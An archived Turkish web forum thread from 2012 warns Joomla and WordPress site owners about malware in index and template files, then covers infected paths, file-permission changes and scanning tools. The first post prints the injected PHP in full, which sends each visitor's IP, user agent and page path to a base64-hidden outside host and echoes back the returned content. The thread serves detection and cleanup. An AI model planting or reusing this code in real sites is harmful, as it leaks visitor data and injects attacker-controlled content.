PDA

Orijinalini görmek için tıklayınız : DİKKAT: Virüs



Akar
31-03-2012, 02:09
botsvsbrowsers .com/tarafından yayılan bir virüse son 10 günde, benim ftp erişimi sağlamadığım 2 ayrı yerde rastladım. Bu virüsü kaspersky kullanıcıları farkedemiyor ancak ESET kullanıcıları standart yapılandırma farkedebiliyor. Virüs Joomla!'nın ana index dosyası, administrator altındaki index dosyası ve tema index dosyalarına (system dahil) bulaşıyor. Ancak ana dizin index dosyasında ilk anda yer almıyor. Bu da sonradan uzaktan tetiklendiği kanısını uyandırıyor bende. Bu kanıya sebep olan bir başka şey ise ana dizine ek dosya oluşturulması. Virüs sisteme bulaştıktan bir ya da birkaç gün sonra ana dizinde kendine ek bir dosya oluşturuyor.

Virüs içeriği:


?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zd GF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}

Virüs bu kod ile şimdilik kendine dolaylı yoldan hit sağlıyor. Ancak uzaktan hesabınıza sızan birinin başka neler yapabileceğini bilemezsiniz. Şifrelenmiş alanda şu sayaç sayfası yer alıyor
botstatisticupdate. com/stat/stat.php
Özellikle Kaspersky kullanıcıları sitelerini en kısa zamanda kontrol etmeliler. Önemli bir uyarı; kasperskynin görmediği bu virüsü arama motoru botları görüyor, Google belirli bir süre içinde tekraren virüs gördüğü siteyi güvensiz olarak işaretliyor; unutmayın.

Devamı:
Bot vs Browsers Virüsüne Dikkat - Aytuğ Halil AKAR (http://www.aytugakar.info/joomla-haber-duyuru/305-bot-vs-browsers-virusune-dikkat.html)

muratyil
31-03-2012, 09:10
Bulaşıp bulaşmadığını nasıl anlayacağız? Antivirüssüz anlamanın yolu var mı?

alpeki99
31-03-2012, 11:36
6 yıllık web site geçmişimde ilk defa bir siteme zararlı bulaştı ve bu da ne yazık ki benim tedbiri elden bırakmamdan dolayı oldu. Bu aralar bu tip zararlı içerikler sitelere bulaşıyor ve temizlemesi hiçte kolay değil. Yukarıda görüldüğü gibi kimi anti-virusler bunu algılayamıyor ya da zararlı olarak kabul etmeyebiliyorlar. Bu tip durumlarda en iyi yapılacak tespit yöntemlerinden birisi bu işe yoğunlaşmış web siteleri. Ücretsiz tarama hizmeti sunup güvenlik için ücret isteyebiliyorlar.İşte bu sitelerden bir tanesinin adresi:

Sucuri SiteCheck - Free Website Malware Scans (http://sitecheck.sucuri.net/scanner/)

muratyil
31-03-2012, 12:05
Teşekkürler böylesi daha iyi oldu. temiz çıktım temiz kağıdı aşağıda :)
web site: TÜRKÇE JOOMLA TEMALARI (http://www.joomlatema.net)
status: Verified Clean
web trust: Not Blacklisted

mhusty
31-03-2012, 16:26
:) bende temiz çıktım ... Umarım böyle saçma sapan virüslerle uğraşmayız

Akar
31-03-2012, 16:55
Evet benzer siteleri ben de kullanıyorum arada. Yalnız enfekte olması beklenen dosyalar bilinirse öncelile onları elle kontrol etmekte fayda var. Mesela burada belli; tema index dosyaları. Ayrıca ana dizin index dosyası enfekte olmuyor ama düzenlenme tarihi değişiyor. Muhtemelen bot önce buna da bulaştırıyor virüsü ama sonradan buradan sildiriliyor (sonradan eklenmiş olabilir silinmesi).

Önemli bir şey:
Joomla içinde şifrelenmiş herhangi bir alana rastlayamazsınız. Bu bir işaret olmalı sizin için. Tabii sonradan kurulan eklentilerinizde belki olabilir ama Joomlanın kendisinde ve eklentilerin çoğunluğunda şifrelenmiş alan olmaz. Joomla paketiyle gelen dosyalarda bir şifreleme gördüyseniz orası muhakkak sorunludur. Joomlanın kaynağı tamamen açıktır.

Ümit
31-03-2012, 17:05
Aynı kodu geçen hafta bir müşterinin sitem çok yavaşladı demesi ile wordpress sitesinde bulup temizlemiştim. Wordpress 'de temanın functions.php dosyası içinde bulunuyor.

Wordpress 'e etkisi anasayfa hariç diğer sayfalarda linkler çıkıyor (adult). Linkler her zaman görünmediği için fark etmek de zor oluyor. Aynı sorunu yaşayan birçok wordpress sitesine google aracılığı ile ulaşmak mümkün.

batuhansaglam
01-04-2012, 01:17
Alakasız olacak gibi ama az evvel stargazetesinin sitesine girmeye çalıştığımda, firefox tarayıcım " beni bu siteden kurtar" uyarısı verdi. demekki büyük sitelerin başınada bu tür şeyler gelebiliyor.

melancholy
01-04-2012, 01:53
Bir kaç sitede karşılaştım, ben de lisanslı kaspersky yüklü yakaladı :)

HDMI
02-04-2012, 08:52
ben karspersky , nod , fsecure dan alamadığım performansı avast ile alıyorum.. zımba gibi..

muratyil
02-04-2012, 16:10
Temiz çıktım ama içim rahat etmedi temanın index.php sini açıp baktığımda en altta gizlenmiş hacklinkler gördüm. Akar iyi ki açmışsın konuyu valla...

Akar
05-04-2012, 21:50
Avastı önereyim demeyin arkadaşlar. Bu piyasada yıllardır Kaspersky ve Eset üzerine antivirüs çıkmamıştır. Kalanların da hepsi denenmiştir.

Bu arada, yukarıdaki virüsün bir Joomla 1.5 sitede includes/footer.php dosyasına da bulaştığını az evvel gördüm. Ayrıca bulaştığı dosyaların CHMOD seviyesini 755 olarak değiştiriyor olabilir...henüz emin değilim; müşterim ded eğiştirmiş olabilir diyeceğim ama nerden girecek includes dizinine de ne yapacak footer.php'de.

GNCTürk
05-04-2012, 22:11
Bende bilmediğim ve ilk defa gireceğim siteyi buradan (http://www.e-siber.com/virus-tarama/) taratıyorum %90 doğru sonuç veriyor. Bir de Nod32 Güncel Son sürüm ile Stopzilla Spyware (ücretli) kullanıyorum..Bilgisayarımı her 2-3 güne bir taratıyorum..Çok şükür şuan sorunum yok...Saygılar..

orhangazi10
30-04-2012, 14:39
muhasebeogretmenleri.com benim sitede de aynı sorunlar olduğunu söyledi öğrenciler... bende hiçbir porblem yok ama iki üç farklı kişiden şikayet aldım. kara liste olarak çıkardı az önce tarama yaptım. ne yapmamız gerekiyor arkadaşlar ?

aligultekin34
30-04-2012, 15:10
Aytuğ abi bu iki site iş görüyormu bu konuda.DAha öncedende paylaşmıştım.

http://onlinelinkscan.com/


http://linkscanner.explabs.com/linkscanner/AVG/default.aspx (http://onlinelinkscan.com/)

orhangazi10
30-04-2012, 15:23
bulunamadı yazıyor. ama öğretmen arkadaşım ve öğrencilerim siteye girdiklerinde ikisinin bilgisayarı çökmüş bir tanesi de virüs algılandı dedi diyor.

ne oludğunu bende anlamadım

aligultekin34
30-04-2012, 15:27
Şu sitede kaynaklar buldum online tarama yapan siteler var. Bide buradakilere baksak iyi olur diye düşünüyorum

Online Site Tarama Servisleri - EraByte.Net (http://www.erabyte.net/2010/10/online-site-tarama-servisleri.html)

orhangazi10
30-04-2012, 15:44
Sucuri SiteCheck - Free Website Malware Scans (http://sitecheck.sucuri.net/results/muhasebeogretmenleri.com) burada kara liste çıkıyor.
790

Akar
30-04-2012, 17:38
Sitelerinizi dediğim şeylere göre tarayacaksınız arkadaşlar. Otomatik tarayan siteler size nerede sorun olduğunu söylemiyor. Siz dediğim gibi tarayın, verdiğim referanslara göre bulmaya çalışın.

güngör
30-04-2012, 18:18
Es- Selamun Aleyküm Aytuğ hocam bilgilendirme için teşekkür ederim. Bu konu ilk açıldığında yukarıda belirtilen siteden sitemi taratmış fakat sorun olmadığını görmüştüm. Yalnız bir kaç gündür kullanıcılardan sitemde virüs uyarısı alındığına dair mesajlar alıyorum.

Filist(dosya liste) indirdim fakat kendi sitenizde veridiğiniz wordpres için mi acaba joomla da çalıştıramadım. dizin açılamadı uyarısı veriyor.

ayrıca yukarıda ifade ettiğiniz gibi site index.php ve tema index.php 755 olmuştu.

ayrıca site index php ile tema index.php içinde acayip kodlar gördüm ve orjinalleri ile üzerine yazdırmak suretiyle değiştirdim.

sizce virüs var mıdır sitemde.
kesin anlamanın yolu nedir. Bu konuyu biraz daha açmamız mümkün müdür acaba.
iyi akşamlar dilerim

Akar
30-04-2012, 19:11
Es- Selamun Aleyküm Aytuğ hocam bilgilendirme için teşekkür ederim. Bu konu ilk açıldığında yukarıda belirtilen siteden sitemi taratmış fakat sorun olmadığını görmüştüm. Yalnız bir kaç gündür kullanıcılardan sitemde virüs uyarısı alındığına dair mesajlar alıyorum.

Filist(dosya liste) indirdim fakat kendi sitenizde veridiğiniz wordpres için mi acaba joomla da çalıştıramadım. dizin açılamadı uyarısı veriyor.

ayrıca yukarıda ifade ettiğiniz gibi site index.php ve tema index.php 755 olmuştu.

ayrıca site index php ile tema index.php içinde acayip kodlar gördüm ve orjinalleri ile üzerine yazdırmak suretiyle değiştirdim.

sizce virüs var mıdır sitemde.
kesin anlamanın yolu nedir. Bu konuyu biraz daha açmamız mümkün müdür acaba.
iyi akşamlar dilerimve Aleyküm selam,

Dosya tüm sistemlerde çalışır normalde ama bazı dizinlerde neden olduğunu bilmediğim şekilde çalışmadığına şahit oldum. Sizde de buna engel olan bir şey vardır muhakkak. Dediğiniz emareler virüsün bulaşmış olduğunu gösteriyor. Bir defa 755 olan dosyalar kesinlikle enfkte olmuş. Zararlı kodların da zaten bulaştığını görmüşsünüz. Konuda bahsettiğim diğer dizin ve dosyaları kontrol etmenizin faydası olacaktır. Ayrıca dizinlerinize ftp züerinden eriştiğinizde tarihe göre sıralatarak müdahale etmediğiniz ama değişmiş dosyaları görmeniz mümkün olabilir.

Bu virüsün genel olarak bulaştığı yerler:

index.php (erişim alıyor ama virüsü eklemiyor, izin seviyesi değiştiriliyor)
administrator/index.php
administrator/templates (muhtelif dosyalar)
includes/footer.php (kullandığınız sürüme göre bu dizin değişebilir)
templates/system (index.php ve olası diğer doslyalar)
templates/temanız (index.php ve olası diğer doslyalar)
templates/varsayılantemalar (index.php ve olası diğer doslyalar)


Bunların tamamına ya da bir kısmına bulaşmış olabilir. Bilgisayarınızın temizliğinden emin olmalısınız.

Virüs, doğrudan gözükmeyen bir şekilde iframe açıyor. Normalde iframe açılan sitelerde bunu ana sayfada kyna kodlardan görmek mümkün olabiliyor ama bu virüste aynı yerden görülemiyor.

güngör
30-04-2012, 21:50
mesajınızda saymaış olduğunuz tüm dosyalar 755 durumundaydı. hepsini yenileri ile değiştirdim. umarım düzelir. çok teşekkür ediyorum . gelişmeleri buraya yazmaya devam edeceğim.

orhangazi10
30-04-2012, 22:35
aynı sorun bende de var hocam bende düzeltmeye çalışayım. teşekkürler güngör ve akay hocam.

güngör
16-06-2012, 15:45
Essalamun Aleyküm
Yine ben. Daha doğrusu bu konuya mesaj yazmış biri olarak yine ben.
yukarıda söylenenleri yaptıktan sonra site de düzelme olmuştu.
Ama şimdi görüyorum ki sitem yine virüslerle dolu
artık temizleyecek gücüm kalmadı çünkü temizledikçe artıyor.

Sucuri SiteCheck - Free Website Malware Scanner (http://sitecheck.sucuri.net/results/tarihogretmeni.org) burada sitemle ilgili sonuçlarda görülüyor zaten.
Acaba veritabanına da bulaşmış mıdır. Eğer bulaşmadı ise ben yedek alıp joomlayı yeniden kurmak istiyorum olur mu acaba.
ya da başka öneriniz var mı AKAR hocam ve Diğer YÖNETİCİ arkadaşlar

güngör
16-06-2012, 19:06
Akar Hocam Cevaplarınızı bekliyorum :(

Akar
17-06-2012, 14:38
Tekrar eden virüs sorunlarını kuvvetle ihtimal kişisel bilgisayarınız ile ilgildir. Kişisel bilgisayarınız ya da siteye ftp erişimi alan bilgisayarlar diyelim, daha doğru olur.